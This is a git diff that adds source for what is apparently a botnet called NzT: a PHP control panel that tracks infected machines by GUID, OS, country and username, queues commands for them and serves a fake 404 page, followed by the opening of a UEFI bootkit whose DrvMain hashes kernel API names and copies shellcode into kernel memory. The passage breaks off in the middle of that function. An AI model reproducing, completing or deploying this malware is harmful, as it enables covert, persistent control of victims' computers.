$gi->record_length = ORG_RECORD_LENGTH; + } + } + break; + } else { + $offset -= 4; + } + } + if (($gi->databaseType == GEOIP_COUNTRY_EDITION) || + ($gi->databaseType == GEOIP_COUNTRY_EDITION_V6) || + ($gi->databaseType == GEOIP_PROXY_EDITION) || + ($gi->databaseType == GEOIP_NETSPEED_EDITION) + ) { + $gi->databaseSegments = GEOIP_COUNTRY_BEGIN; + } + } else { + $filepos = ftell($gi->filehandle); + fseek($gi->filehandle, -3, SEEK_END); + for ($i = 0; $i < STRUCTURE_INFO_MAX_SIZE; $i++) { + $delim = fread($gi->filehandle, 3); + if ($delim == (chr(255) . chr(255) . chr(255))) { + $gi->databaseType = ord(fread($gi->filehandle, 1)); + if ($gi->databaseType >= 106) { + $gi->databaseType -= 105; + } + if ($gi->databaseType == GEOIP_REGION_EDITION_REV0) { + $gi->databaseSegments = GEOIP_STATE_BEGIN_REV0; + } elseif ($gi->databaseType == GEOIP_REGION_EDITION_REV1) { + $gi->databaseSegments = GEOIP_STATE_BEGIN_REV1; + } elseif (($gi->databaseType == GEOIP_CITY_EDITION_REV0) + || ($gi->databaseType == GEOIP_CITY_EDITION_REV1) + || ($gi->databaseType == GEOIP_CITY_EDITION_REV0_V6) + || ($gi->databaseType == GEOIP_CITY_EDITION_REV1_V6) + || ($gi->databaseType == GEOIP_ORG_EDITION) + || ($gi->databaseType == GEOIP_DOMAIN_EDITION) + || ($gi->databaseType == GEOIP_ISP_EDITION) + || ($gi->databaseType == GEOIP_ORG_EDITION_V6) + || ($gi->databaseType == GEOIP_DOMAIN_EDITION_V6) + || ($gi->databaseType == GEOIP_ISP_EDITION_V6) + || ($gi->databaseType == GEOIP_LOCATIONA_EDITION) + || ($gi->databaseType == GEOIP_ACCURACYRADIUS_EDITION) + || ($gi->databaseType == GEOIP_CITY_EDITION_REV0_V6) + || ($gi->databaseType == GEOIP_CITY_EDITION_REV1_V6) + || ($gi->databaseType == GEOIP_NETSPEED_EDITION_REV1) + || ($gi->databaseType == GEOIP_NETSPEED_EDITION_REV1_V6) + || ($gi->databaseType == GEOIP_USERTYPE_EDITION) + || ($gi->databaseType == GEOIP_USERTYPE_EDITION_V6) + || ($gi->databaseType == GEOIP_ASNUM_EDITION) + || ($gi->databaseType == GEOIP_ASNUM_EDITION_V6) + ) { + $gi->databaseSegments = 0; + $buf = fread($gi->filehandle, SEGMENT_RECORD_LENGTH); + for ($j = 0; $j < SEGMENT_RECORD_LENGTH; $j++) { + $gi->databaseSegments += (ord($buf[$j]) << ($j * 8)); + } + if (($gi->databaseType == GEOIP_ORG_EDITION) + || ($gi->databaseType == GEOIP_DOMAIN_EDITION) + || ($gi->databaseType == GEOIP_ISP_EDITION) + || ($gi->databaseType == GEOIP_ORG_EDITION_V6) + || ($gi->databaseType == GEOIP_DOMAIN_EDITION_V6) + || ($gi->databaseType == GEOIP_ISP_EDITION_V6) + ) { + $gi->record_length = ORG_RECORD_LENGTH; + } + } + break; + } else { + fseek($gi->filehandle, -4, SEEK_CUR); + } + } + if (($gi->databaseType == GEOIP_COUNTRY_EDITION) || + ($gi->databaseType == GEOIP_COUNTRY_EDITION_V6) || + ($gi->databaseType == GEOIP_PROXY_EDITION) || + ($gi->databaseType == GEOIP_NETSPEED_EDITION) + ) { + $gi->databaseSegments = GEOIP_COUNTRY_BEGIN; + } + fseek($gi->filehandle, $filepos, SEEK_SET); + } + return $gi; +} + +function geoip_open($filename, $flags) +{ + $gi = new GeoIP; + $gi->flags = $flags; + if ($gi->flags & GEOIP_SHARED_MEMORY) { + $gi->shmid = @shmop_open(GEOIP_SHM_KEY, "a", 0, 0); + } else { + $gi->filehandle = fopen($filename, "rb") or trigger_error("GeoIP API: Can not open $filename\n", E_USER_ERROR); + if ($gi->flags & GEOIP_MEMORY_CACHE) { + $s_array = fstat($gi->filehandle); + $gi->memory_buffer = fread($gi->filehandle, $s_array['size']); + } + } + + $gi = _setup_segments($gi); + return $gi; +} + +function geoip_close($gi) +{ + if ($gi->flags & GEOIP_SHARED_MEMORY) { + return true; + } + + return fclose($gi->filehandle); +} + +function geoip_country_id_by_name_v6($gi, $name) +{ + $rec = dns_get_record($name, DNS_AAAA); + if (!$rec) { + return false; + } + $addr = $rec[0]["ipv6"]; + if (!$addr || $addr == $name) { + return false; + } + return geoip_country_id_by_addr_v6($gi, $addr); +} + +function geoip_country_id_by_name($gi, $name) +{ + $addr = gethostbyname($name); + if (!$addr || $addr == $name) { + return false; + } + return geoip_country_id_by_addr($gi, $addr); +} + +function geoip_country_code_by_name_v6($gi, $name) +{ + $country_id = geoip_country_id_by_name_v6($gi, $name); + if ($country_id !== false) { + return $gi->GEOIP_COUNTRY_CODES[$country_id]; + } + return false; +} + +function geoip_country_code_by_name($gi, $name) +{ + $country_id = geoip_country_id_by_name($gi, $name); + if ($country_id !== false) { + return $gi->GEOIP_COUNTRY_CODES[$country_id]; + } + return false; +} + +function geoip_country_name_by_name_v6($gi, $name) +{ + $country_id = geoip_country_id_by_name_v6($gi, $name); + if ($country_id !== false) { + return $gi->GEOIP_COUNTRY_NAMES[$country_id]; + } + return false; +} + +function geoip_country_name_by_name($gi, $name) +{ + $country_id = geoip_country_id_by_name($gi, $name); + if ($country_id !== false) { + return $gi->GEOIP_COUNTRY_NAMES[$country_id]; + } + return false; +} + +function geoip_country_id_by_addr_v6($gi, $addr) +{ + $ipnum = inet_pton($addr); + return _geoip_seek_country_v6($gi, $ipnum) - GEOIP_COUNTRY_BEGIN; +} + +function geoip_country_id_by_addr($gi, $addr) +{ + $ipnum = ip2long($addr); + return _geoip_seek_country($gi, $ipnum) - GEOIP_COUNTRY_BEGIN; +} + +function geoip_country_code_by_addr_v6($gi, $addr) +{ + $country_id = geoip_country_id_by_addr_v6($gi, $addr); + if ($country_id !== false) { + return $gi->GEOIP_COUNTRY_CODES[$country_id]; + } + return false; +} + +function geoip_country_code_by_addr($gi, $addr) +{ + if ($gi->databaseType == GEOIP_CITY_EDITION_REV1) { + $record = geoip_record_by_addr($gi, $addr); + if ($record !== false) { + return $record->country_code; + } + } else { + $country_id = geoip_country_id_by_addr($gi, $addr); + if ($country_id !== false) { + return $gi->GEOIP_COUNTRY_CODES[$country_id]; + } + } + return false; +} + +function geoip_country_name_by_addr_v6($gi, $addr) +{ + $country_id = geoip_country_id_by_addr_v6($gi, $addr); + if ($country_id !== false) { + return $gi->GEOIP_COUNTRY_NAMES[$country_id]; + } + return false; +} + +function geoip_country_name_by_addr($gi, $addr) +{ + if ($gi->databaseType == GEOIP_CITY_EDITION_REV1) { + $record = geoip_record_by_addr($gi, $addr); + return $record->country_name; + } else { + $country_id = geoip_country_id_by_addr($gi, $addr); + if ($country_id !== false) { + return $gi->GEOIP_COUNTRY_NAMES[$country_id]; + } + } + return false; +} + +function _geoip_seek_country_v6($gi, $ipnum) +{ + # arrays from unpack start with offset 1 + # yet another php mystery. array_merge work around + # this broken behaviour + $v6vec = array_merge(unpack("C16", $ipnum)); + + $offset = 0; + for ($depth = 127; $depth >= 0; --$depth) { + if ($gi->flags & GEOIP_MEMORY_CACHE) { + $buf = _safe_substr( + $gi->memory_buffer, + 2 * $gi->record_length * $offset, + 2 * $gi->record_length + ); + } elseif ($gi->flags & GEOIP_SHARED_MEMORY) { + $buf = @shmop_read( + $gi->shmid, + 2 * $gi->record_length * $offset, + 2 * $gi->record_length + ); + } else { + fseek($gi->filehandle, 2 * $gi->record_length * $offset, SEEK_SET) == 0 + or trigger_error("GeoIP API: fseek failed", E_USER_ERROR); + $buf = fread($gi->filehandle, 2 * $gi->record_length); + } + $x = array(0, 0); + for ($i = 0; $i < 2; ++$i) { + for ($j = 0; $j < $gi->record_length; ++$j) { + $x[$i] += ord($buf[$gi->record_length * $i + $j]) << ($j * 8); + } + } + + $bnum = 127 - $depth; + $idx = $bnum >> 3; + $b_mask = 1 << ($bnum & 7 ^ 7); + if (($v6vec[$idx] & $b_mask) > 0) { + if ($x[1] >= $gi->databaseSegments) { + return $x[1]; + } + $offset = $x[1]; + } else { + if ($x[0] >= $gi->databaseSegments) { + return $x[0]; + } + $offset = $x[0]; + } + } + trigger_error("GeoIP API: Error traversing database - perhaps it is corrupt?", E_USER_ERROR); + return false; +} + +function _geoip_seek_country($gi, $ipnum) +{ + $offset = 0; + for ($depth = 31; $depth >= 0; --$depth) { + if ($gi->flags & GEOIP_MEMORY_CACHE) { + $buf = _safe_substr( + $gi->memory_buffer, + 2 * $gi->record_length * $offset, + 2 * $gi->record_length + ); + } elseif ($gi->flags & GEOIP_SHARED_MEMORY) { + $buf = @shmop_read( + $gi->shmid, + 2 * $gi->record_length * $offset, + 2 * $gi->record_length + ); + } else { + fseek($gi->filehandle, 2 * $gi->record_length * $offset, SEEK_SET) == 0 + or trigger_error("GeoIP API: fseek failed", E_USER_ERROR); + $buf = fread($gi->filehandle, 2 * $gi->record_length); + } + $x = array(0, 0); + for ($i = 0; $i < 2; ++$i) { + for ($j = 0; $j < $gi->record_length; ++$j) { + $x[$i] += ord($buf[$gi->record_length * $i + $j]) << ($j * 8); + } + } + if ($ipnum & (1 << $depth)) { + if ($x[1] >= $gi->databaseSegments) { + return $x[1]; + } + $offset = $x[1]; + } else { + if ($x[0] >= $gi->databaseSegments) { + return $x[0]; + } + $offset = $x[0]; + } + } + trigger_error("GeoIP API: Error traversing database - perhaps it is corrupt?", E_USER_ERROR); + return false; +} + +function _common_get_org($gi, $seek_org) +{ + $record_pointer = $seek_org + (2 * $gi->record_length - 1) * $gi->databaseSegments; + if ($gi->flags & GEOIP_SHARED_MEMORY) { + $org_buf = @shmop_read($gi->shmid, $record_pointer, MAX_ORG_RECORD_LENGTH); + } else { + fseek($gi->filehandle, $record_pointer, SEEK_SET); + $org_buf = fread($gi->filehandle, MAX_ORG_RECORD_LENGTH); + } + $org_buf = _safe_substr($org_buf, 0, strpos($org_buf, "\0")); + return $org_buf; +} + +function _get_org_v6($gi, $ipnum) +{ + $seek_org = _geoip_seek_country_v6($gi, $ipnum); + if ($seek_org == $gi->databaseSegments) { + return null; + } + return _common_get_org($gi, $seek_org); +} + +function _get_org($gi, $ipnum) +{ + $seek_org = _geoip_seek_country($gi, $ipnum); + if ($seek_org == $gi->databaseSegments) { + return null; + } + return _common_get_org($gi, $seek_org); +} + + +function geoip_name_by_addr_v6($gi, $addr) +{ + if ($addr == null) { + return 0; + } + $ipnum = inet_pton($addr); + return _get_org_v6($gi, $ipnum); +} + +function geoip_name_by_addr($gi, $addr) +{ + if ($addr == null) { + return 0; + } + $ipnum = ip2long($addr); + return _get_org($gi, $ipnum); +} + +function geoip_org_by_addr($gi, $addr) +{ + return geoip_name_by_addr($gi, $addr); +} + +function _get_region($gi, $ipnum) +{ + if ($gi->databaseType == GEOIP_REGION_EDITION_REV0) { + $seek_region = _geoip_seek_country($gi, $ipnum) - GEOIP_STATE_BEGIN_REV0; + if ($seek_region >= 1000) { + $country_code = "US"; + $region = chr(($seek_region - 1000) / 26 + 65) . chr(($seek_region - 1000) % 26 + 65); + } else { + $country_code = $gi->GEOIP_COUNTRY_CODES[$seek_region]; + $region = ""; + } + return array($country_code, $region); + } elseif ($gi->databaseType == GEOIP_REGION_EDITION_REV1) { + $seek_region = _geoip_seek_country($gi, $ipnum) - GEOIP_STATE_BEGIN_REV1; + if ($seek_region < US_OFFSET) { + $country_code = ""; + $region = ""; + } elseif ($seek_region < CANADA_OFFSET) { + $country_code = "US"; + $region = chr(($seek_region - US_OFFSET) / 26 + 65) . chr(($seek_region - US_OFFSET) % 26 + 65); + } elseif ($seek_region < WORLD_OFFSET) { + $country_code = "CA"; + $region = chr(($seek_region - CANADA_OFFSET) / 26 + 65) . chr(($seek_region - CANADA_OFFSET) % 26 + 65); + } else { + $country_code = $gi->GEOIP_COUNTRY_CODES[(int) (($seek_region - WORLD_OFFSET) / FIPS_RANGE)]; + $region = ""; + } + return array($country_code, $region); + } + return null; +} + +function geoip_region_by_addr($gi, $addr) +{ + if ($addr == null) { + return 0; + } + $ipnum = ip2long($addr); + return _get_region($gi, $ipnum); +} + +function _safe_substr($string, $start, $length) +{ + // workaround php's broken substr, strpos, etc handling with + // mbstring.func_overload and mbstring.internal_encoding + $mbExists = extension_loaded('mbstring'); + + if ($mbExists) { + $enc = mb_internal_encoding(); + mb_internal_encoding('ISO-8859-1'); + } + + $buf = substr($string, $start, $length); + + if ($mbExists) { + mb_internal_encoding($enc); + } + + return $buf; +} diff --git a/panel/inc/ui.php b/panel/inc/ui.php new file mode 100644 index 0000000..c1651ca --- /dev/null +++ b/panel/inc/ui.php @@ -0,0 +1,69 @@ + + + + + NzT - <?php echo($title); ?> + + + + + +'.$text.''); +} + +function ui_content_start() +{ +?> +
+ +
+
+ +
+
+
+ NzT + + | + logout + +
+ + + + \ No newline at end of file diff --git a/panel/inc/utils.php b/panel/inc/utils.php new file mode 100644 index 0000000..37ec95e --- /dev/null +++ b/panel/inc/utils.php @@ -0,0 +1,237 @@ +No file uploaded'); +} + +function gen_qmarks($arr) +{ + return str_repeat('?, ', count($arr) - 1).'?'; +} + +function get_pag_vars($total, &$pages, &$page, &$offset) +{ + global $CONST_PAGE_LIMIT; + $pages = ceil($total / $CONST_PAGE_LIMIT); + $page = 1; + if(isset($_GET['page'])) + { + $page = (int) $_GET['page']; + if($page > $pages) + $page = $pages; + else if($page < 1) + $page = 1; + } + $offset = ($page - 1) * $CONST_PAGE_LIMIT; +} + +function get_os($os) +{ + if($os == 0) + return 'Windows 2000'; + else if ($os == 1) + return 'Windows XP'; + else if ($os == 2) + return 'Windows Vista'; + else if ($os == 3) + return 'Windows 7'; + else if ($os == 4) + return 'Windows 8'; + else if ($os == 5) + return 'Windows 8.1'; + else if ($os == 6) + return 'Windows 10'; + else if ($os == 7) + return 'Windows 11'; + else + return 'Unknown'; +} + +function get_ip() +{ + if (isset($_SERVER["HTTP_X_REAL_IP"])) + { + return $_SERVER["HTTP_X_REAL_IP"]; + } + else if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) + { + return $_SERVER ["HTTP_X_FORWARDED_FOR"]; + } + + return $_SERVER ['REMOTE_ADDR']; +} + +function get_country($ip) +{ + $gi = geoip_open('inc/geoip.dat', GEOIP_STANDARD); + $country = geoip_country_code_by_addr($gi, $ip); + geoip_close($gi); + if (empty($country)) + return '??'; + return $country; +} + +function format_time($time) +{ + return date('d/m/Y H:i:s', $time); +} + +function time_since($time) +{ + $time = time() - $time; + $time = ($time < 1) ? 1 : $time; + $tokens = array ( + 31536000 => 'year', + 2592000 => 'month', + 604800 => 'week', + 86400 => 'day', + 3600 => 'hour', + 60 => 'minute', + 1 => 'second' + ); + + foreach($tokens as $unit => $text) + { + if($time < $unit) continue; + $numberOfUnits = floor($time / $unit); + return $numberOfUnits.' '.$text.(($numberOfUnits > 1) ? 's' : '').' ago'; + } +} + +function is_online($time) +{ + global $CONF_TIMEOUT_OFFLINE; + return (time() - $time) < $CONF_TIMEOUT_OFFLINE ; +} + +function echo_hidden_fields() +{ + $args = func_get_args(); + foreach($_GET as $name => $value) + { + if(!in_array($name, $args)) + echo(''); + } +} + +function echo_pag_form($page, $pages) +{ + $firstDisabled = $page == 1 ? 'disabled' : ''; + echo('
First'); + echo(' Previous'); + echo_hidden_fields('page'); + echo(' '); + $lastDisabled = $page == $pages ? 'disabled' : ''; + echo(' Next'); + echo(' Last
'); +} + +function add_get_param($name, $value) +{ + $params = $_GET; + unset($params[$name]); + $params[$name] = $value; + return basename($_SERVER['PHP_SELF']).'?'.http_build_query($params); +} + +function action_sec_check() +{ + if($_SERVER['REQUEST_METHOD'] == 'POST') + $userTime = $_POST['time']; + else + $userTime = $_GET['time']; + if($userTime != $_SESSION['time']) + exit(); +} + +function error404() +{ + header('HTTP/1.1 404 Not Found', TRUE, 404); + echo << + + 404 Not Found + +

Not Found

+ The requested URL $_SERVER[REQUEST_URI] was not found on this server. +
+ $_SERVER[HTTP_HOST] + +HTML; + echo str_repeat ("\r\n", 50); + exit(); +} + +function http_redirect($url) +{ + header("Location: $url"); + exit(); +} + +function http_no_cache() +{ + header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); + header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT"); + header("Pragma: no-cache"); + header("Cache-Control: no-cache, must-revalidate"); +} + + +?> \ No newline at end of file diff --git a/panel/index.php b/panel/index.php new file mode 100644 index 0000000..ecfc38b --- /dev/null +++ b/panel/index.php @@ -0,0 +1,129 @@ +query('SELECT COUNT(*) FROM bots'); +$totalBots = $query->fetchColumn(); + +$total = $totalBots; + +if($total == 0) + echo('
Database is empty
'); +else +{ +?> + +
+prepare('SELECT COUNT(*) FROM bots WHERE last_seen > ?'); + $query->bindValue(1, time() - $CONF_TIMEOUT_OFFLINE, PDO::PARAM_INT); + $query->execute(); + $online = (int) $query->fetchColumn(); + $offline = $total - $online; + + $query = $db->prepare('SELECT COUNT(*) FROM bots WHERE last_seen < ?'); + $query->bindValue(1, time() - $CONF_TIMEOUT_DEAD, PDO::PARAM_INT); + $query->execute(); + $dead = $query->fetchColumn(); + + $query = $db->prepare('SELECT COUNT(*) FROM bots WHERE last_seen > ?'); + $query->bindValue(1, time() - 60 * 60 * 24, PDO::PARAM_INT); + $query->execute(); + $online24h = (int) $query->fetchColumn(); +?> +
+
Amount
+ + + + + + +
Total:
Online:
Offline:
Bots seen since 24h:
Dead:
+
+query('SELECT COUNT(*) FROM bots WHERE arch = 1'); + $x64 = $query->fetchColumn(); + + $os = array(); + $query = $db->query('SELECT os FROM bots'); + $rows = $query->fetchAll(); + foreach($rows as $row) + { + $osName = get_os($row['os']); + if(isset($os[$osName])) + ++$os[$osName]; + else + $os[$osName] = 1; + } + arsort($os); +?> +
+
Computer Info
+ + $value) + echo(''); +?> + + +
'.$key.':'.format_count($value).'
x64:
x86:
+
+
+
Countries
+ +query('SELECT DISTINCT country, COUNT(*) as num FROM bots GROUP BY country ORDER BY num DESC'); + $rows = $query->fetchAll(); + $geoip = new GeoIP(); + foreach($rows as $row) + { + echo(''); + } +?> +
'.$row['country'].' ('.$geoip->GEOIP_COUNTRY_NAMES[$geoip->GEOIP_COUNTRY_CODE_TO_NUMBER[$row['country']]].'):'.format_count($row['num']).'
+
+
+ \ No newline at end of file diff --git a/panel/login.php b/panel/login.php new file mode 100644 index 0000000..386234d --- /dev/null +++ b/panel/login.php @@ -0,0 +1,48 @@ + +
+
Login
+ Invalid username or password!
'); + } + ?> +
+ + + + + + +
Username:
Password:
+ +
+
+ + \ No newline at end of file diff --git a/panel/logout.php b/panel/logout.php new file mode 100644 index 0000000..025206f --- /dev/null +++ b/panel/logout.php @@ -0,0 +1,12 @@ + \ No newline at end of file diff --git a/panel/private/.htaccess b/panel/private/.htaccess new file mode 100644 index 0000000..3418e55 --- /dev/null +++ b/panel/private/.htaccess @@ -0,0 +1 @@ +deny from all \ No newline at end of file diff --git a/panel/private/db.sql b/panel/private/db.sql new file mode 100644 index 0000000..d3a50b3 --- /dev/null +++ b/panel/private/db.sql @@ -0,0 +1,43 @@ +/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; +/*!40101 SET NAMES utf8 */; +/*!50503 SET NAMES utf8mb4 */; +/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; +/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; + +DROP DATABASE IF EXISTS `panel`; +CREATE DATABASE IF NOT EXISTS `panel` /*!40100 DEFAULT CHARACTER SET latin1 */; +USE `panel`; + +DROP TABLE IF EXISTS `bots`; +CREATE TABLE IF NOT EXISTS `bots` ( + `id` int(11) unsigned NOT NULL AUTO_INCREMENT, + `guid` varchar(50) NOT NULL, + `ip` int(11) unsigned NOT NULL, + `os` tinyint(4) unsigned NOT NULL, + `arch` tinyint(4) unsigned NOT NULL, + `country` char(2) NOT NULL, + `username` varchar(50) NOT NULL, + `last_seen` int(11) unsigned NOT NULL, + `first_seen` int(11) unsigned NOT NULL, + `last_command` int(11) unsigned NOT NULL, + PRIMARY KEY (`id`), + UNIQUE KEY `guid` (`guid`) +) ENGINE=InnoDB DEFAULT CHARSET=latin1; + +DROP TABLE IF EXISTS `commands`; +CREATE TABLE IF NOT EXISTS `commands` ( + `id` int(11) unsigned NOT NULL AUTO_INCREMENT, + `execs` int(11) unsigned NOT NULL, + `limit` int(11) unsigned NOT NULL, + `enabled` tinyint(4) unsigned NOT NULL, + `created` int(11) unsigned NOT NULL, + `type` tinyint(4) unsigned NOT NULL, + `param` text NOT NULL, + `countries` text NOT NULL, + `guids` text NOT NULL, + PRIMARY KEY (`id`) +) ENGINE=InnoDB DEFAULT CHARSET=latin1; + +/*!40101 SET SQL_MODE=IFNULL(@OLD_SQL_MODE, '') */; +/*!40014 SET FOREIGN_KEY_CHECKS=IF(@OLD_FOREIGN_KEY_CHECKS IS NULL, 1, @OLD_FOREIGN_KEY_CHECKS) */; +/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; diff --git a/panel/settings.php b/panel/settings.php new file mode 100644 index 0000000..7244bfa --- /dev/null +++ b/panel/settings.php @@ -0,0 +1,148 @@ +Settings updated'); +} + +function write_settings() +{ + global + $CONF_TIMEOUT_OFFLINE, + $CONF_TIMEOUT_DEAD, + $CONF_DB_HOST, + $CONF_DB_NAME, + $CONF_DB_USER, + $CONF_DB_PASS, + $CONF_PANEL_USER, + $CONF_PANEL_PASS; + file_put_contents + ( + 'inc/config.php', + '' + ); + echo_settings_updated_info(); +} + +if(isset($_POST['timeout_offline'])) +{ + action_sec_check(); + if(!ctype_digit($_POST['timeout_offline']) || !ctype_digit($_POST['timeout_dead'])) + echo('
Invalid timeout value
'); + else + { + $CONF_TIMEOUT_OFFLINE = $_POST['timeout_offline']; + $CONF_TIMEOUT_DEAD = $_POST['timeout_dead']; + write_settings(); + } +} +else if(isset($_POST['db_name'])) +{ + action_sec_check(); + $CONF_DB_HOST = $_POST['db_host']; + $CONF_DB_NAME = $_POST['db_name']; + $CONF_DB_USER = $_POST['db_user']; + $CONF_DB_PASS = $_POST['db_pass']; + write_settings(); +} +else if(isset($_POST['pass'])) +{ + action_sec_check(); + if($_POST['pass'] === $_POST['pass2']) + { + $minChars = 4; + if(strlen($_POST['pass']) >= $minChars && strlen($_POST['user']) >= $minChars) + { + $CONF_PANEL_USER = $_POST['user']; + $CONF_PANEL_PASS = hash_pass($_POST['pass']); + write_settings(); + } + else + echo('
User and password must be at least '.$minChars.' characters long
'); + } + else + echo('
Passwords are not the same
'); +} +?> + +
+
+
Update Timeouts (Seconds)
+ + + + + +
Timeout:
Dead:
+
+
+
Update Database Credentials
+ + + + + + + +
Host:
Database:
Username:
Password:
+
+
+
+
+
Update Panel Credentials
+ + + + + + +
Username:
Password:
Password Verification:
+
+
+ \ No newline at end of file diff --git a/panel/style/style.css b/panel/style/style.css new file mode 100644 index 0000000..8c1219c --- /dev/null +++ b/panel/style/style.css @@ -0,0 +1,210 @@ +body +{ + font-size: 12px; + font-family: Verdana, Geneva, sans-serif; + background: #FFF; + width: 1100px; + margin: auto; + padding-top: 10px; + background: #F2F2F2; +} + +.nav +{ + padding: 2px 5px; +} + +.nav a, .btn +{ + border: 1px solid #AAA; + color: rgb(0, 0, 0); + text-decoration: none; + margin-right: -1px; + padding: 2px 20px; + background: #F2F2F2; + background-image: linear-gradient(to top, #E8E8E8 0%, #FFF 50%, #F7F7F7 100%); + position: relative; + border-radius: 2px; +} + +.btn +{ + color: #000; +} + +.nav a +{ + border-bottom-left-radius: 0px; + border-bottom-right-radius: 0px; + padding: 2px 20px; +} + +.nav a:hover, .btn:hover +{ + background-image: linear-gradient(to bottom, #E8E8E8 0%, #FFF 50%, #F7F7F7 100%); +} + +.nav a.current +{ + background: #F7F7F7; + border-bottom: 1px solid #F7F7F7; + padding-top: 4px; + box-shadow: 5px 0 5px -5px #AAA, -5px 0 5px -5px #AAA; + z-index: 1; + color: #000; +} + +.nav a.current:first-child +{ + box-shadow: 5px 0 5px -5px #AAA; +} + +.nav a.current:last-child +{ + box-shadow: -5px 0 5px -5px #AAA; +} + +.content +{ + border: 1px solid #888; + padding: 10px; + background: #F7F7F7; +} + +.input +{ + padding: 2px; + border: 1px solid #AAA; + border-radius: 2px; +} + +form table td:first-child +{ + padding-right: 10px; + width: 1%; +} + +.box +{ + border: 1px solid #888; + padding: 10px; + background: #F2F2F2; + border-radius: 2px; +} + +.box div:first-child +{ + font-style: bold; + border-bottom: 1px solid #AAA; + margin: -10px; + margin-bottom: 10px; + padding: 5px; + background-image: linear-gradient(to top, #E8E8E8 0%, #FFF 50%, #F7F7F7 100%); +} + +.box div:first-child:before, +.box div:first-child:after +{ + content: ''; + color: #AAA; + padding-right: 5px; + padding-left: 5px; +} + +.margin-bottom +{ + margin-bottom: 10px; +} + +.margin-top +{ + margin-top: 10px; +} + +.center { + margin: 0; + position: absolute; + top: 50%; + left: 50%; + -ms-transform: translate(-50%, -50%); + transform: translate(-50%, -50%); + } + +.info, .error, .success +{ + padding: 5px 0px; + border: 1px solid; + text-align: center; + font-size: 12px; +} + +.info +{ + color: #00529B; + background: #f2f2ff; +} + +.error +{ + color: #D8000C; + background: #ffe5e5; +} + +.success +{ + color: #00d81d; + background: #ffe5e5; +} + +.box .input +{ + width: 100%; +} + +.table +{ + border-collapse: collapse; + width: 100%; +} + +.table td, .table th +{ + border: 1px solid #AAA; + padding: 5px; +} + +.table th +{ + font-style: bold; + background-image: linear-gradient(to top, #E8E8E8 0%, #FFF 50%, #F7F7F7 100%); + font-weight: normal; + border: 1px solid #888; +} + +.table tr:nth-child(even) +{ + background: #F7F7F7; +} + +.table tr:nth-child(odd) +{ + background: #F2F2F2; +} + +.disabled +{ + pointer-events: none; + cursor: default; + opacity: 0.6; +} + +.footer +{ + text-align: center; + padding: 5px 0px; + border: 1px solid #888; + border-top: 0px; + background-image: linear-gradient(to top, #E8E8E8 0%, #FFF 50%, #F2F2F2 100%); + color: #666; + display: block; +} \ No newline at end of file diff --git a/src/Bootkit/Common.h b/src/Bootkit/Common.h new file mode 100644 index 0000000..2b85b43 --- /dev/null +++ b/src/Bootkit/Common.h @@ -0,0 +1,17 @@ +#pragma once + +#include +#include +#include "global/Labels.h" +#include "global/Macros.h" +#include "global/Config.h" +#include "global/Hash.h" +#include "global/Pe.h" +#include "gnu-efi/efi.h" + +#include "OslArchTransferToKernel.h" +#include "ExitBootServices.h" +#include "DrvMain.h" +#include "EfiMain.h" +#include "Native.h" +#include "EfTbl.h" diff --git a/src/Bootkit/DrvMain.c b/src/Bootkit/DrvMain.c new file mode 100644 index 0000000..58530ce --- /dev/null +++ b/src/Bootkit/DrvMain.c @@ -0,0 +1,127 @@ +#include "Common.h" + +VOID +NTAPI +KeSetSystemAffinityThread( + _In_ SIZE_T Affinity +); + +PVOID +NTAPI +ExAllocatePool( + _In_ SIZE_T PoolType, + _In_ SIZE_T NumberOfBytes +); + +VOID +NTAPI +MmUnmapIoSpace( + _In_ LPVOID BaseAddress, + _In_ SIZE_T NumberOfBytes +); + +PVOID +NTAPI +MmMapIoSpace( + _In_ LPVOID PhysicalAddress, + _In_ SIZE_T NumberOfBytes, + _In_ SIZE_T CacheType +); + +typedef struct +{ + D_API( KeSetSystemAffinityThread ); + D_API( ExAllocatePool ); + D_API( MmUnmapIoSpace ); + D_API( MmMapIoSpace ); +} API ; + +/* API Hashes */ +#define H_API_KESETSYSTEMAFFINITYTHREAD 0x80679c78 /* KeSetSystemAffinityThread */ +#define H_API_EXALLOCATEPOOL 0xa1fe8ce1 /* ExAllocatePool */ +#define H_API_MMUNMAPIOSPACE 0xf2610ec4 /* MmUnmapIoSpace */ +#define H_API_MMMAPIOSPACE 0x7fbf0801 /* MmMapIoSpace */ + +/*! + * + * Purpose: + * + * Copies over a larger kernel shellcode and injects + * it into the host memory. + * +!*/ +D_SEC( G ) NTSTATUS NTAPI DrvMain( _In_ PVOID DriverObject, _In_ PVOID RegistryPath ) +{ + API Api; + + ULONG Ofs = 0; + + PVOID Fcn = NULL; + PVOID Phy = NULL; + PEFTBL Eft = NULL; + PIMAGE_DOS_HEADER Dos = NULL; + PIMAGE_NT_HEADERS Nth = NULL; + PIMAGE_SECTION_HEADER Sec = NULL; + PLDR_DATA_TABLE_ENTRY Ldr = NULL; + + /* Zero out stack structures */ + RtlSecureZeroMemory( &Api, sizeof( Api ) ); + + /* Get efi table */ + Eft = C_PTR( G_PTR( EfTbl ) ); + Dos = C_PTR( U_PTR( Eft->TgtDrvImgBase ) ); + Nth = C_PTR( U_PTR( Dos ) + Dos->e_lfanew ); + Ldr = C_PTR( U_PTR( Eft->TgtDrvLdrEntry ) ); + Sec = C_PTR( U_PTR( Eft->TgtDrvImgSect ) ); + + /* Get functions */ + Api.KeSetSystemAffinityThread = PeGetFuncEat( Eft->KernelBase, H_API_KESETSYSTEMAFFINITYTHREAD ); + Api.ExAllocatePool = PeGetFuncEat( Eft->KernelBase, H_API_EXALLOCATEPOOL ); + Api.MmUnmapIoSpace = PeGetFuncEat( Eft->KernelBase, H_API_MMUNMAPIOSPACE ); + Api.MmMapIoSpace = PeGetFuncEat( Eft->KernelBase, H_API_MMMAPIOSPACE ); + + /* Map the physical memory */ + if ( ( Phy = Api.MmMapIoSpace( Eft->KernelBuf, Eft->KernelLen, 0 ) ) != NULL ) { + /* Allocate a nonpaged pool to execute over */ + if ( ( Fcn = Api.ExAllocatePool( 0 /* NonPaged */, Eft->KernelLen ) ) != NULL ) { + + /* Copy over the buffer */ + __builtin_memcpy( Fcn, 